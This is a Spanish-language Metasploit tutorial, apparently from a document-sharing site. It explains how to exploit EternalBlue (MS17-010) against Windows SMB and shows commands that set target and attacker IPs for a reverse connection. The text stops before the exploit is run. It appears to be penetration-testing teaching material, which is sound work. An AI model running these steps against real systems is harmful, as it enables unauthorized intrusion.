Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Eternalblue Odt
Eternalblue Odt
la Explotación
A continuación se presenta un proceso ligero para utilizar algunos comandos de Metasploit
Framework, los cuales son muy útiles para la fase de explotación.
• Search: Busca por todos los exploits en la base de datos de Mestasploit Framework,
basándose también en identificadores como CVE.
• Use: Define la utilización de un exploit, el cual se ajuste mejor al requerimiento.
• Show Payloads: Muestra los payloads disponibles para el exploit seleccionado.
• Set Payload: Define la utilización de un payload para el exploit seleccionado.
• Show Options: Visualiza las opciones necesarias las cuales deben ser configuradas como
parte del payload seleccionado.
• Set Options: Asigna valores a todas las opciones necesarias, las cuales deben estar presentes
para el éxito del payload.
• Exploit: Envía el exploit previamente configurado hacia el sistema objetivo.
Para empezar es necesario iniciar el servicio postgresql, para luego iniciar Metasploit Framework.
Esto es bastante sencillo, pues únicamente se debe escribir en el terminal el comando “msfconsole”.
Esto debe demorar alrededor de un minuto. También se sugiere actualizar frecuentemente
Metasploit Framework, pues constantemente se incluyen nuevos módulos.
Aquí hay tres opciones importantes las cuales se deben definir; RHOST para definir la dirección IP
del objetivo en evaluación (victima), LHOST para definir la dirección IP del host local o atacante, y
LPORT para definir el puerto local donde se recibirá la conexión entrante. Aunque esta última
opción podría utilizarse con su definición por defecto.
Set Option (Ajustar Opción)
Se necesitan asignar todos los valores requeridos para las opciones del exploit y payload. Si se
dejasen en blanco, el exploit fallaría porque no contiene la información necesaria para funcionar
completamente.
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.0.70
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.78
Luego de esto se sugiere utilizar el comando para verificar la correcta definición de las opciones.